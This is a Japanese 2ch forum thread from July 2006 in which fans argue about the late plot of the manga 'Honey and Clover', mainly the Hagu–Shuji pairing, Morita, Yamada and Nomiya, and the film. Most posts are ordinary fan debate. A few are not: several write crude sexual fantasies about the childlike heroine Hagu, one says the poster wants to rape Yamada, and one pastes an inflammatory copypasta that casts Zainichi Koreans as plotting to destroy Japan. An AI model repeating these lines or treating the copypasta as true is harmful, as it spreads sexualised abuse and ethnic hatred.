美和子に「一生お友達」宣言されちまったんで、美和子とのゴールインはなさそうだ

125 :花と名無しさん:2006/07/12(水) 18:29:20 ID:???0
ここで 

オサレ×山田 と 言ってみる         アリエナスだがw

126 :花と名無しさん:2006/07/12(水) 18:36:35 ID:???0
そんな真山並に友情に薄情なオサレは嫌だ

127 :花と名無しさん:2006/07/12(水) 18:37:31 ID:???0
野宮と山田の関係も、いまいちハッキリしないんだけど
ああ言う状況で野宮を山田に近づけるんなら
そのプチ設定だけでもスッキリ解決してくれんかと思う。
作者、何が描きたいの?

128 :花と名無しさん:2006/07/12(水) 21:12:17 ID:???0
もうオサレ×リーダーでいいよ

129 :花と名無しさん:2006/07/12(水) 21:13:39 ID:???0
>>123
少女漫画系のスレだと、ネタ投下も絵投下って「ウザ」みたいに
言われることが多いもんね。
(少女漫画でも、まゆたんスレはネタが喜ばれるが…)

でも、(あんまり誉めて、その投下した人が「馴れ合いウザイ」みたいに
叩かれたらいくないので、サラッとしか誉めなかったけど)
過去スレでウプされた、臭がはぐに真っ赤になってるキモイ改変を
ウプした人のは「上手いなー」と思った。

あと、デスノートが「はぐノート」になってるパロディサイトも面白かった。


130 :花と名無しさん:2006/07/12(水) 21:20:49 ID:???0
美和子さんは気づいていてあえて突き放してる気がしなくもない。

ウミノさんの初期設定表ではまだ先なのかもしれないけどいい加減山田は決着つけるべきだよなぁ。
山田からはっきり野宮に意思表示した事ってあったっけ?「待ってください」レベルの発言も無かったような・・・。

131 :花と名無しさん:2006/07/12(水) 21:21:21 ID:???0
>>129
なにそれ、どっちも興味ある。

132 :花と名無しさん:2006/07/12(水) 21:56:33 ID:???0
実現性は別として、現状でカップリングの自然さにおいて、
オサレ×美和子より野宮×山田が劣る件について。
 
もうちょっと早く野宮が青春スーツを装備すれば良かったんだろうか。
それとも最後に一話分丸々使って最後の仕上げでもするんだろうか。
ちなみに真山×理花は丸々一話使って駄目押ししたよな。
二人以外誰も出ない話まで作って。
この気合いの入り様は、一体何。
責任持って野宮×山田もそうしてくれ。

133 :花と名無しさん:2006/07/12(水) 22:01:32 ID:???0
え、終わるの確定でたの?

134 :花と名無しさん:2006/07/12(水) 22:04:06 ID:???0
>>105-107

まあアニメとの歩調考えるともうそろそろ限界だろ。

135 :花と名無しさん:2006/07/12(水) 22:43:51 ID:???0
ていうかもう話が最終回に向けて不自然なほど着々と進んでるじゃんどう見ても。

136 :花と名無しさん:2006/07/12(水) 22:53:18 ID:???0
>>132
理花は心の傷が深いって設定で
真山との関係も長々とひっぱってて
片付けなきゃいけないことが多かったから
まるまる1話必要かもしれないけど
野宮と山田はなぁ。
失恋した女とかっこいい大人の男でしょ?
もうくっつかない方がおかしいくらいだから
放置でいいよ。
それよりはぐ関係ちゃんとかけ!羽海野!

137 :花と名無しさん:2006/07/12(水) 22:59:21 ID:???0
>失恋した女とかっこいい大人の男でしょ?
男はともかく女の方は根拠不明の真山病を患っているから…
山田を普通の女と思っちゃダメつーか、あいつ変だよ…

138 :花と名無しさん:2006/07/12(水) 23:00:00 ID:???0
実は修とはぐは兄妹で、結婚できないってオチとみた
そんでショックで心中しちゃうの

139 :花と名無しさん:2006/07/12(水) 23:03:10 ID:???0
韓国ドラマかよW

140 :花と名無しさん:2006/07/12(水) 23:05:38 ID:???O
自分コミックス派だからイマイチ話がつかめないんだけど、はぐは修に恋愛感情があって未来を託したの?
それとも自分が絵を描き続けたいから未来を託したの?

でも森田はあぼんなのか…orz
森田とくっついてほしかった

141 :花と名無しさん:2006/07/12(水) 23:06:10 ID:???0
>>139
そう、それではぐだけ生き残っちゃって、引き取り先の家でいじめられちゃうの

142 :花と名無しさん:2006/07/12(水) 23:15:53 ID:???0
>140
はぐが修に恋愛感情があるかどうかは現時点では明確にされていない。
ただ、子供の頃の回想で一緒に昼寝をしてるシーンが出て
そこには、はぐの修に対する「わたしのだいじな だいじなひと」と言うモノローグあり。

修は、はぐが「自分の気持ちに気付いていると思う」と山田に言っている。

143 :花と名無しさん:2006/07/12(水) 23:15:58 ID:???0
>>139
あとは記憶喪失になれば完璧だね

>>140
そこの説明が無いから納得がいかないんだよねー
でもはぐの好きな人は森田らしいから
恋愛感情ではなかったんじゃない?
修の恋心(ロリ心)を利用したようにしか思えん

144 :花と名無しさん:2006/07/12(水) 23:20:52 ID:???O
あの中では森田が好きなので、森田には幸せになってほしいなぁ。

145 :花と名無しさん:2006/07/12(水) 23:29:36 ID:???0
森田は…女がいなくても幸せになれる人ではあるんだよな。
そういや竹本も仕事柄女とか言ってられないんだよな。
 
そういう消去法?

146 :花と名無しさん:2006/07/12(水) 23:30:16 ID:???0
今月号の野宮のへんてこ後付解説によると
はぐは好きより大事なものがあってそれを選んだことになってなかった?
だから森田が好きなんだけど
それより大事な芸術が出来る環境を作ってくれる臭の人生をもらた、と。
臭はあからさまに恋愛感情むき出しだけどね。


147 :花と名無しさん:2006/07/12(水) 23:30:21 ID:???O
もりた

148 :花と名無しさん:2006/07/12(水) 23:36:48 ID:???O
はぐは性悪女だなあでギリギリ受け入れられる
臭は無理キモイ

149 :花と名無しさん:2006/07/12(水) 23:38:07 ID:???0
親戚だから甘えられると考えれば腹も立たない
修だって、まさかまさか肉体関係を持とうとは考えないでしょう、でしょう?

150 :花と名無しさん:2006/07/12(水) 23:40:57 ID:???0
野宮の比喩がよく分からなかったんだけど

「押したら真山が山田を好きになるスイッチを押す」=森田との恋愛をとる
は分かったけど、
「代わりにリーダーが闇に閉じ込められる」は何のたとえ?
森田の才能を活躍させてやれないって事であれば
「代わりに真山は目が見えなくなる」とかの方が良くない?

151 :花と名無しさん:2006/07/12(水) 23:41:10 ID:???O
もう夏期講習の眼鏡×はぐでいいよ。

152 :花と名無しさん:2006/07/12(水) 23:42:26 ID:???0
肉体関係なしで一生添い遂げるつもり???
その方が男としてキモイ。

153 :花と名無しさん:2006/07/12(水) 23:43:19 ID:???0
>>149
いや・・・
「先生も男だったんですね」だよ?
頬染めてるんだよ?

154 :花と名無しさん:2006/07/12(水) 23:52:24 ID:???0
おれが修だったらはぐに手コキさせる
すげえザーメン出そう

155 :花と名無しさん:2006/07/12(水) 23:56:16 ID:???0
>>153
そういう目でず〜っとはぐのことを見守ってきたのか・・・
たけのこの妨害工作をさりげなくしつつ

156 :花と名無しさん:2006/07/12(水) 23:57:47 ID:???O
(´Д`)うわぁ

157 :花と名無しさん:2006/07/12(水) 23:59:17 ID:???0
境目はどこなのかはっきりさせて欲しい。
1巻からだったら本気で凹む。
森田とはぐのお買い物の後の会話は保護者の立場からと思いたいんだけど。

158 :花と名無しさん:2006/07/13(木) 00:01:04 ID:???0
>157
そのあたりは普通に保護者として描いてたと思うよ。
修はぐになったのはホントについ最近だと思う。
だから唐突なのに説明もフォローも出来ないんだよ。

159 :花と名無しさん:2006/07/13(木) 00:01:04 ID:???0
まあとにかくそういう同人が出まくるって事ですね。
あ、もう既に出ているんだろうか?

160 :花と名無しさん:2006/07/13(木) 00:03:23 ID:???0
ハチクロって同人界に需要あるの?

161 :花と名無しさん:2006/07/13(木) 00:03:23 ID:???0
保護者としての立場だからこそ過剰な接触や猫可愛がりや
竹本や森田に対する牽制も読者は微笑ましく見れたわけだし
今さら何の説明もなく突然恋愛感情出されたってな…

162 :花と名無しさん:2006/07/13(木) 00:04:04 ID:???0
ハチクロ自体が同人みたいなもんだしねぇ

163 :花と名無しさん:2006/07/13(木) 00:11:36 ID:???0
ドラえもんが実はのび太に恋愛感情抱いていたくらいの衝撃?

164 :花と名無しさん:2006/07/13(木) 00:12:53 ID:???0
ドラえもんとのび太は赤の他人だし
そもそも男同士なので比べてもしょうがないと思うんだが。

165 :花と名無しさん:2006/07/13(木) 00:16:21 ID:???0
>>158
つい最近だとしたらそれはそれでまた腹立たしいな。
竹本や森田のことわかってるくせに何だよ!

166 :花と名無しさん:2006/07/13(木) 00:22:31 ID:???0
>>165
心を鬼にして、怪我が治るまでと思ってるんだよ

167 :花と名無しさん:2006/07/13(木) 00:22:42 ID:???0
>>154
手コキでいいのか?
はぐのでかい口でフェラさせないのか?


168 :花と名無しさん:2006/07/13(木) 00:24:34 ID:???0
>>167
おまえはわかってない
あのおびえたような顔で、おそるおそる手コキさせるのが乙なんだよw
顔にかかるまで射精しちゃうね、おれw

169 :花と名無しさん:2006/07/13(木) 00:50:29 ID:???O
映画の森田は随分性格が違うね
イケメンの兄ちゃんだ

170 :花と名無しさん:2006/07/13(木) 01:02:09 ID:???0
>169
ギャグやコメディ映画じゃないのに、ひとりだけ
おかしな性格の森田なんか演じたくないだろ。

171 :花と名無しさん:2006/07/13(木) 01:58:53 ID:eN3F+WNi0
>>164
じゃあさ、ドラえもんとのび太ママができちゃったのを知ったのび太の心境

172 :花と名無しさん:2006/07/13(木) 02:01:47 ID:???0
あげてもた。ごめんなさい。

173 :sage:2006/07/13(木) 02:09:28 ID:bTlYp5a+0
誰も>>111にはつっこまないのか

174 :花と名無しさん:2006/07/13(木) 02:35:00 ID:???0
>>150
>「代わりに真山は目が見えなくなる」とかの方が良くない?

その方がいいな〜
いくらなんでも犬と対比しなくてもね・・・。

しかしあのシーンでメソメソする山田ちょっとな〜

175 :花と名無しさん:2006/07/13(木) 02:40:18 ID:???0
>>153
「先生も男だったんですね」

ユニコーンに守ってもらうほどの山田が言うと
生々しいな。

176 :花と名無しさん:2006/07/13(木) 02:42:24 ID:???0
ハチクロって主に出てくる動物は犬だけど、
森田がらみのところだけことごとく猫が出てくるよね。
可愛がりすぎてノイローゼにさせたとか
マフラーチュウのとことか
ピータールーカスの拉致事件2のハローキティとか
子供お絵かき教室とか。
森田の自由奔放さの象徴って事かな、芸が細かいな


と思ってた自分が可哀想になるくらいのあまりに無理やりな展開ですね。

177 :花と名無しさん:2006/07/13(木) 02:45:03 ID:???0
>>171
それ書こうと思ったw
読者=のび太で「お前ら何やってんだよ!」な感じがね。

178 :花と名無しさん:2006/07/13(木) 02:46:28 ID:???0
>>173
いいなこれ。
竹本と結婚して“竹本はぐみ”になって
しかも芸術家として成功したってことか。

179 :花と名無しさん:2006/07/13(木) 03:14:08 ID:zsLzLdmt0
あーなるほど(´・∀・`)

180 :花と名無しさん:2006/07/13(木) 05:43:22 ID:???0
youtubeにハチクロうpまだー?

181 :花と名無しさん:2006/07/13(木) 08:16:53 ID:???O
かばみのドチビなとこって明らかにウミノの投影だよ☆

182 :花と名無しさん:2006/07/13(木) 08:19:03 ID:???0
そんなのみんな分かってます><

183 :花と名無しさん:2006/07/13(木) 08:32:30 ID:???0
背が小さいくて華奢なだけで男の保護欲丸取りタイプって昔からきらわれるねぇ

184 :花と名無しさん:2006/07/13(木) 08:33:42 ID:???0
>171
>177
ドラえもんは野比家に居候してるけど自立してるし、
のび太ママに保護者になってもらわなくても困る立場ではない。
そう言う立場の関係で恋愛沙汰になるのと修はぐは全く違う。

もう根底から設定の違うものを同例としてあげるの
いい加減に辞めたらどうか。

185 :花と名無しさん:2006/07/13(木) 08:36:20 ID:???0
>>184
あなたも同様にウザイです

186 :花と名無しさん:2006/07/13(木) 08:44:55 ID:???0
はぐって何であんな服をいつも着てるの?

187 :花と名無しさん:2006/07/13(木) 08:47:01 ID:???0
>>186
作者の願望 ・・・と、言ってみるテスト

188 :花と名無しさん:2006/07/13(木) 08:49:52 ID:???0
どう考えても他作品例え厨のほうがウザイ。
散々ウザイ言われてるのに空気嫁。

189 :花と名無しさん:2006/07/13(木) 08:57:12 ID:???0
そもそも修はぐみたいに親戚同士で
子供の頃から保護者として見守ってきた親代わりが
何の前触れもなく突然恋愛感情持ち出してきて
メインの話に入ってくる作品なんて見た事ないです。

キモイです。

190 :花と名無しさん:2006/07/13(木) 09:04:43 ID:???0
担当や編集もよく許可したもんだ

191 :花と名無しさん:2006/07/13(木) 09:24:11 ID:???0
>>160
ハチクロの妄想カップリング小説サイト
(ちゃんとした小説の形をとってなくて
 会話を台本みたいに羅列しただけとか
 心情を短いポエムにしただけ〜みたいな
 お粗末な内容だったけど。
 2ちゃんのハチクロエロパロスレに投下された作品のほうが
 レベル高かったな)
があったり、
mixiに、ハチクロを
「自分風の絵」で描いた絵をウプしてるコミュニティが
あったから(はぐが目が大きいキラキラの目のロリっになってた)
同人的需要も結構あるのかもしれない。

でも、ハチクロ自体が同人漫画みたいなもんなので
それをわざわざ同人にしても…と私だったら思ってしまう。


192 :花と名無しさん:2006/07/13(木) 09:38:40 ID:???0
そんな個人的な趣味はどうでもいいよ
問題なのは本編だよ

193 :花と名無しさん:2006/07/13(木) 09:47:07 ID:???0
これだけ本編がクソになったら
神みたいな展開のラストを描いてくれる同人が出たらそっちに金出すよ。

194 :花と名無しさん:2006/07/13(木) 10:03:55 ID:???0
同人のお約束として、突っ込み所やラストに不満の多い作品の方が同人の介入する余地は増えるし、
顧客も簡単に確保できる目算が立つ。
もっとも種死みたいに全体的に酷すぎて見捨てられる事もあるが。

195 :花と名無しさん:2006/07/13(木) 10:07:56 ID:???O
>>156はどのレス対して「うわぁ」なのか

196 :花と名無しさん:2006/07/13(木) 10:40:15 ID:???0
来月は春になって竹本の卒製の塔完成、あゆに鳩プレゼント
2人で義母にあげる鳩を持って長野に帰る……前に修がはぐにプロポーズとかありそう。

197 :花と名無しさん:2006/07/13(木) 12:07:34 ID:???0
7巻で終わったことにしてそれ以降は記憶から抹消したい…

198 :花と名無しさん:2006/07/13(木) 12:31:54 ID:???0
>>196
「春になって」が「母になって」に見えたorz

199 :花と名無しさん:2006/07/13(木) 12:32:07 ID:???0
今日、コミック早売りしてるのかな…
ほんと、7巻までなら(・∀・)イイ!!のに…
買うのもためらってしまう。

200 :花と名無しさん:2006/07/13(木) 12:48:00 ID:???0
コミックスはどこまで載るんだろう。
読みきり話を混ぜたりして、臭×はぐ展開は9巻には
載らないのか、それとも載るのか。

201 :花と名無しさん:2006/07/13(木) 12:54:27 ID:???0
コミックス買えた人、コミックスのネタバレお願いします。

私は北海道在住なので、公式発売日の2〜3日後が
北海道発売日なため、読めるのは7/17以降になりそうだ('A`)

202 :花と名無しさん:2006/07/13(木) 13:30:14 ID:???0
修のいってた三つ目の選択肢ってなに?

203 :花と名無しさん:2006/07/13(木) 13:30:49 ID:???0
「見守る」じゃない?

204 :花と名無しさん:2006/07/13(木) 13:35:57 ID:???0
何もしないじゃない?

205 :花と名無しさん:2006/07/13(木) 13:38:34 ID:???O
はぐとの間に作品を作る事。

206 :花と名無しさん:2006/07/13(木) 13:39:10 ID:???0
先延ばしにするじゃない?

207 :花と名無しさん:2006/07/13(木) 13:44:53 ID:???O
流れに任せる

208 :花と名無しさん:2006/07/13(木) 16:25:02 ID:???O
映画が本編

209 :花と名無しさん:2006/07/13(木) 16:54:16 ID:???0
それだ!

210 :花と名無しさん:2006/07/13(木) 16:56:41 ID:???0
いいのか?
そんな自爆になりかねない事言って…

211 :花と名無しさん:2006/07/13(木) 17:04:31 ID:???0
やっぱり取り消す

212 :花と名無しさん:2006/07/13(木) 17:14:01 ID:???0
映画は真山×理花が熟女物のAVみたいな生々しさになるのを期待している俺。
8巻分までは行かないだろうけど。

213 :花と名無しさん:2006/07/13(木) 17:23:04 ID:???O
映画は真山が変態
漫画の森田より変人

214 :花と名無しさん:2006/07/13(木) 17:32:05 ID:???0
でもって理花が普通の三十路美人。元は綾波キャラだが。
公式サイトの眼鏡掛けた真山は意外とそっくりだな。

215 :花と名無しさん:2006/07/13(木) 17:32:56 ID:???O
8巻のキャプ52の扉絵は、これからのハチクロの未来

はぐが池の鳥と遊んでて、森田がはぐの足をひっぱって自分の元へこさせようとしてる
それを修が阻止しようとしてて、竹本がそんな3人を見守っている

216 :花と名無しさん:2006/07/13(木) 17:34:11 ID:???O
映画のはぐは本当におとなしい子

217 :花と名無しさん:2006/07/13(木) 17:43:18 ID:???0
>>215
前々スレくらいで同じような書き込みあったね
「鳥がガラスに変わって・・・」とかなんとか

218 :花と名無しさん:2006/07/13(木) 17:49:32 ID:???0
ハチクロ読んでから観覧車を見る目が変わった。
なんだかせつない印象に…
あの観覧車のエピソードは好きだ。
今となっては5人だけであの男がいないのがさらに良い。
あのモデルになった観覧車はいつもあんなに人がいないの?
いつか乗ってみたい。
だれかハチクロ読んでからわざわざ乗りに行った人いませんか?

219 :花と名無しさん:2006/07/13(木) 17:50:00 ID:???0
映画はアニメ一期と同じようなところで終わるみたいだから
真山とリカの結末までは描かれないんじゃないの

220 :花と名無しさん:2006/07/13(木) 17:52:57 ID:???O
全然違うラスト
誰かとくっつくのを望んでる人は見ない方がいい

221 :花と名無しさん:2006/07/13(木) 17:56:11 ID:???0
>>193

このスレ内だけでも、ラストの予想とか結構でてたよな。
ネタ重視なのも多いが。

最近見かけたやつで
「結局はぐの手は治らず、修と心中」
みたいなのがあって...これはなんか泣けた

なんにせよ、本編に神ラスト期待するのもそろそろ苦しくなってきたYO

222 :花と名無しさん:2006/07/13(木) 17:57:23 ID:???O
もりたぁ!!!!!!!

223 :花と名無しさん:2006/07/13(木) 17:57:44 ID:???O
>>218
それはワルツのようだね〜、不思議さ〜

224 :花と名無しさん:2006/07/13(木) 17:58:25 ID:???O
森田って結局フられた?

225 :花と名無しさん:2006/07/13(木) 17:59:13 ID:g8EFDqQXO
そういや九巻は早売りしないのかな?
帰りに本屋二軒寄ったけどなかったよ。

226 :花と名無しさん:2006/07/13(木) 17:59:33 ID:???0
>>220
まぁ、はぐと臭がくっつかないんならなんでもいいや。
全員片思いラストでオケ。


227 :花と名無しさん:2006/07/13(木) 18:00:57 ID:???O
はぐと森田は映画にくっつく雰囲気


228 :花と名無しさん:2006/07/13(木) 18:02:14 ID:???0
nihongode ok

229 :花と名無しさん:2006/07/13(木) 18:03:11 ID:???O
森田とはぐはくっつくが離れる

230 :花と名無しさん:2006/07/13(木) 18:04:52 ID:???O
もりたぁ!!!

231 :花と名無しさん:2006/07/13(木) 18:06:44 ID:???O
9巻買うべきか…?


232 :花と名無しさん:2006/07/13(木) 18:07:18 ID:???0
意味無し一行レス いい加減やめてください

233 :花と名無しさん:2006/07/13(木) 18:08:36 ID:???O
>>231
躊躇してるならやめとけ
そのうちブクオ(ry

234 :花と名無しさん:2006/07/13(木) 18:10:34 ID:???O
9巻って誰が中心の話が入る?
自分コミックス派だから流れがイマイチわからん

235 :花と名無しさん:2006/07/13(木) 18:10:43 ID:???0
>>231
森田のナゾの金儲けの真相が明かされたりするし、
気になってたのなら買ってみるのもいいのでは。
あ、ひょっとしてもう読了済だったりするか。


236 :花と名無しさん:2006/07/13(木) 18:13:13 ID:???0
そうだな、こんな展開になるのならいっそ、全員片思いで終わった方が綺麗だった

237 :花と名無しさん:2006/07/13(木) 18:13:49 ID:???0
9巻かぁ
お金払うのはいいんだけど、
それによって羽海野のふところが潤うかと思うと・・・
漫喫かな。

238 :花と名無しさん:2006/07/13(木) 18:16:00 ID:EKWXvYv50
9巻は森田兄弟の話がメインやろ。

239 :花と名無しさん:2006/07/13(木) 18:17:02 ID:???O
森田か…森田一番気に入ってたのに
(´Д`)あ〜あ

240 :花と名無しさん:2006/07/13(木) 18:18:35 ID:???O
連載とれるとコミックスが出るんですよ。(で、印税ウハウハ(゚∀゚)
by まゆたん

241 :花と名無しさん:2006/07/13(木) 18:20:16 ID:???0
これっていわゆる幼女萌えアニオタ層に人気あるの?
正直はぐはソレ狙いかと思ってたんだけど。
お洒落女子とオタク男子どっちもつかんだならすごいよね貪欲さが。

242 :花と名無しさん:2006/07/13(木) 18:21:39 ID:???O
残念ながらファンは中高生に多いです

243 :花と名無しさん:2006/07/13(木) 18:24:21 ID:???0
あと女子大生ね。
ファッション雑誌がせっせと特集組んだおかげで。

244 :花と名無しさん:2006/07/13(木) 18:25:13 ID:???O
やっぱ女の子に人気なんでない?

245 :花と名無しさん:2006/07/13(木) 18:26:12 ID:???0
同人時代からくっついてきた腐女子も多いお。

246 :花と名無しさん:2006/07/13(木) 18:28:42 ID:???0
本業の腐女子相手はどうなの?
森田兄弟ハァハァ(´Д`;)みたいなヤシがいるんだろうか。

247 :花と名無しさん:2006/07/13(木) 18:33:17 ID:???0
これ、腐女子狙った作りに見えて、意外と801方面の人気は低いと思う。

248 :花と名無しさん:2006/07/13(木) 18:33:26 ID:???0
ものすごく絵の上手い
真山山田のエロパロなら見たことあるけどなあ。

249 :花と名無しさん:2006/07/13(木) 18:35:46 ID:???0
やっぱり同人もヘテロカップリングが中心じゃない?

250 :花と名無しさん:2006/07/13(木) 18:39:02 ID:???0
へぇ普通に男女だとヘテロカップリングっていうのか。
じゃあ女と女でもホモカップリングって呼ぶの?


スレ違い?

251 :花と名無しさん:2006/07/13(木) 18:39:14 ID:???0
森田とはぐがくっつきゃくっついたで文句を言うくせによ

252 :ピンクな名無し:2006/07/13(木) 18:41:18 ID:3cELZXPK0
はぐは 結局花本先生をえらびます

253 :花と名無しさん:2006/07/13(木) 18:42:48 ID:???0
まちBBSの大阪生野区のスレより

46 名前:ななしやねん メェル:sage 投稿日:2006/07/11(火) 18:41:26 ID:ewZ/1ndo

日本の伝統文化とか、日本語とか、日本人の美徳とかを、
長い年月をかけてでも、内部から徹底的に破壊してやるよw 
もちろんやるからには再起不能なほどにな、覚悟しとけ。

外国人参政権の獲得だって地方から
着々に進んでいる。われわれ在-日の財力と政治力を利用すれば、いとも簡単なことだ。

故に、おまえらみたいな無力な人間が
ネット上でいくら喚いてても無駄なんだよww

日本における在-日の財力がどれほど強力なものか
まったく分かってない無能で哀れな日本人を痛い目にあわせてやるから。


254 :花と名無しさん:2006/07/13(木) 18:44:14 ID:???0
森田とくっついた場合は
一部の竹本派、マニアックな修派が文句言うくらいだったんじゃない?
ファンがこんなに一気にアンチになることはなかったと思うよ。

255 :花と名無しさん:2006/07/13(木) 18:45:14 ID:???0
修ちゃんとくっつく兆候はまったく見られない中でのあの展開だったからね…

256 :花と名無しさん:2006/07/13(木) 18:46:39 ID:???0
>250
女同士のカップルでホモって言うのかどうか判らないおまいは
基本的なことが判ってないんじゃないのか。

257 :花と名無しさん:2006/07/13(木) 18:47:39 ID:???O
流れ的には、森田はぐだった
いきなりロリコン男の元へ…

258 :花と名無しさん:2006/07/13(木) 18:48:36 ID:???0
>251
森はぐは伏線もエピソードもいっぱいあったから
自分は竹はぐ派だけど別に文句は言わない。
そう言う展開になるならそれでもいいと思うし。
ただ何も描いてこなかったカップリングエンドだけは解せん。

259 :花と名無しさん:2006/07/13(木) 18:50:35 ID:???O
森田って鮎の前では男らしいかんじだったのにはぐの前ではガキになっちゃうのはなぜ?

260 :花と名無しさん:2006/07/13(木) 18:51:17 ID:???0
>259
女として意識してる相手とそうでない相手との違い。

261 :花と名無しさん:2006/07/13(木) 18:53:51 ID:???0
納得できんよ、ほのぼの見守っていた人がいきなり頬染めて、
【好きさ!大好きさ!】なんて…これなら上の方にもあったけど
全員実らない方がずっと良かった、本当に。

262 :花と名無しさん:2006/07/13(木) 18:53:54 ID:???0
>>256
今まで同人誌とかの世界では
男×男はホモ、女×女はレズ って(正しくないけど)呼んでると思ってたけど、
異性をヘテロって呼ぶなら同性はやっぱりどっちもホモって呼ぶのかな
って思ったんです。
基本的なことが何を指すかすらわかりません・・・ごめんなさい(´;ω;`)

263 :花と名無しさん:2006/07/13(木) 18:54:05 ID:???O
オリラジのメガネ=真山

264 :花と名無しさん:2006/07/13(木) 18:55:59 ID:???0
>262
(´;ω;`)

265 :花と名無しさん:2006/07/13(木) 18:57:22 ID:???0
森田はあゆを痛々しくて見てらんないから思わずマジになる時があるんでしょう。友人として。
はぐに対する態度は、アレが彼なりの最大限の愛情表現。

266 :花と名無しさん:2006/07/13(木) 19:01:22 ID:???0
森田が変人呼ばわりされてた原因のうち
・ふらっとすぐどっか行っちゃう
・そして謎のバイトで荒稼ぎ
・(そのせいで)浪人しまくり
の3つはもうなくなったんだから、今の森田はそこまで異常な奴でもないよーな

267 :花と名無しさん:2006/07/13(木) 19:06:08 ID:???O
行動が異常

268 :花と名無しさん:2006/07/13(木) 19:06:52 ID:???0
「ああ好きさ大好きさ」のコマの修司が
コアラ(動物の)に見えてしまってしかたない。
これ自分だけか?

269 :花と名無しさん:2006/07/13(木) 19:08:07 ID:???0
>>176
にゃんざぶろうも加えよう?

270 :花と名無しさん:2006/07/13(木) 19:08:32 ID:???0
>>268
ちょwwコアラwwwwww

271 :花と名無しさん:2006/07/13(木) 19:12:14 ID:???0
森田は根本的に変な奴ではあるのは揺るがない。
つーかこの作品の天才肌ってみんな変人だし。
変人度が才能の度合いと比例している。

272 :花と名無しさん:2006/07/13(木) 19:22:37 ID:???0
>>266の上げた森田が変人と呼ばれる理由って
森田の変人たる所以の中では微々たるものじゃね
バイト原因の留年は外因的な理由だけど森田が変人なのは
本人が根本的に本質が人と違うからな気がする
天才に変人って多そうだから別にそれが悪いとも思わないけど

273 :花と名無しさん:2006/07/13(木) 19:34:28 ID:tuPfGdXEO
妄想もうよそう

274 :花と名無しさん:2006/07/13(木) 19:36:33 ID:???0
アニメ見て改めて思ったんだけど
はぐって「ありがとう」ってなかなか言わないね
時々それが気になって仕方がない
リアル親戚に絶対ありがとうって言わない人がいて
それがすごく不快だから余計はぐに好感持てない

275 :花と名無しさん:2006/07/13(木) 20:00:38 ID:???0
そして変態度と愛情が比例するわけか。

修は頬赤らめじゃなくて、選んでくれて嬉しいが「修が一番」ではなく
「芸術一番、森田が二番」な選択なんだと落ち着いて受け止めてる描き方
してくれればOKだったな。

修はぐアリエネーってのもあるけど(本人も周りも)反応がアリエネーってのが大きい。

276 :花と名無しさん:2006/07/13(木) 20:27:00 ID:???0
>>274
こういうところに「父親溺愛」の痕跡が!

277 :花と名無しさん:2006/07/13(木) 20:36:29 ID:???0
実父と修によるダブル過保護教育の賜物ですね

278 :花と名無しさん:2006/07/13(木) 20:43:39 ID:???0
過保護でもいいけど躾けはちゃんとしろよと言いたい
はぐって基本的に感謝の心持ってないよね
人から何かしてもらうことを当たり前のように思ってそう
だから竹本なんかいいように使われまくり

279 :花と名無しさん:2006/07/13(木) 20:44:29 ID:???0
>>274
言われてみれば('A`)
はぐほんと最悪だ。
こんなのに惚れる森田竹本がようわからん。
修は変態だからなんでもいいんだろうけどさー。

280 :花と名無しさん:2006/07/13(木) 20:50:29 ID:???0
d切りスマンが

羽海野チカ「ハチミツとクローバー」 初代スレ ↓
http://choco.2ch.net/gcomic/kako/980/980761603.html

現在とのギャップがスゴスw
初代スレからずっと住民やってます、って人
このスレにいるんかな?
チョト気になった。

281 :花と名無しさん:2006/07/13(木) 21:08:09 ID:???0
山田を犯したい

282 :花と名無しさん:2006/07/13(木) 21:16:29 ID:???0
>>280 なんか目頭が熱くなった・・・ 

>172 名前: 花と名無しさん 投稿日: 2001/03/12(月) 19:30

   >はぐちゃんは修ちゃん先生とくっついたりしないんでしょうか?ちょっと思っただけなのですが。



>173 名前: 花と名無しさん 投稿日: 2001/03/12(月) 19:49

   >はぐちゃんは修ちゃんのこと好きとまではいかないかも
   >しれないけど「特別」だとは思ってるだろうねー。
   >でも修ちゃんは妹とか娘としか思ってないと思う。

   >間山は山田とくっつくの希望!!


283 :花と名無しさん:2006/07/13(木) 21:27:31 ID:???0
>>282

 >でも修ちゃんは妹とか娘としか思ってないと思う。

。・゚・(ノε`)・゚・。

284 :花と名無しさん:2006/07/13(木) 21:38:50 ID:???0
>>282
この172はほんとに純粋に淡い期待がちょびっと脳内をかすめたんでしょうなあ
もし初期から根っからの臭はぐ派がいるならまさに「どうしたらいいのか分からない」心境
なのではないだろうか

285 :花と名無しさん:2006/07/13(木) 21:45:01 ID:???0
いやいや分からないぞ
 
最終回で黒い縁取りの写真になってしまった修先生が拝めるかもしれないし。

286 :花と名無しさん:2006/07/13(木) 21:54:15 ID:???0
>>285 そんでもって、はぐに残した手紙がでてきて
「早く自分の気持ちに素直になれ。森田はずっとおまえのことを見てる」
と書いてある

287 :花と名無しさん:2006/07/13(木) 21:54:44 ID:???O
(・∀・)イイ!

288 :花と名無しさん:2006/07/13(木) 21:57:38 ID:???0
むしろたけのこがはぐと組んで、花本家の財産を狙う作戦だよ

289 :うは自分長文キモスorz:2006/07/13(木) 21:58:22 ID:???0
ホント最近のはぐ絡みのラストスパートは、今までの作品の輝きを一気にぶち壊すイキオイだね。
  A.彼女の卒業後の創作活動の在り方は?
     a-1)広い世界で精力的な創作活動
     a-2)田舎でそこそこの創作活動
  B.森田、竹本との恋の三角関係の決着は?
     b-1)森田と結ばれる(or恋愛に身を置くにはまだまだキャパ・オーバーだが将来的にそれを予感させる)
     b-2)竹本と結ばれる(                      〃                      )
     b-3)この三角関係内で決着はつかない(or将来的にもそれを予感させる)
  C.修司への依存を断ち切ることはできるのか?
     c-1)ヤッター自立できたよー(or将来的にそれを予感させる)
     c-2)まだまだ迷惑かけっぱなしですよ?
 どうやら a-1,b-3(好意的に見てb-1),c-2 で落ち着きそうな感じか。
 8巻読了時点で、a-1,b-1,c-1のチョイスが妥当なんじゃないかと考えてたのだが。
 (理由:a-1→さんざん伏線アリ,b-1→明らかに恋心アリ,c-1→自立しとけよここは)
ただ、AとCの項目に関して「a-1を選択することは、c-2を選択することが前提となる」(=精力的な創作活動を実現するためには修司への依存が必須)
という命題がどうやら成立しているらしいことが、6巻の時点から描かれるようになってきていたのも事実。
 それでも、それをどうにか克服してくれるんだろうと思っていたのに
最近の怪我エピで「修司に迷惑かけ続けるコト」が全肯定されちまうし、
さらに「a-1を選んだからには、b-1やb-2なんてハナシにならないお!」「はぐは修の生き甲斐なんだお!」等々、
なんとも痛い論調でこれでもかとはぐと修司の閉鎖的な依存関係がプッシュされ('A`)
その上、●「実は修司ははぐに性的関心(恋心)がありました。なぜなら奴も男だから」
    ●「しかもはぐはそれに気づいちゃってたりして」
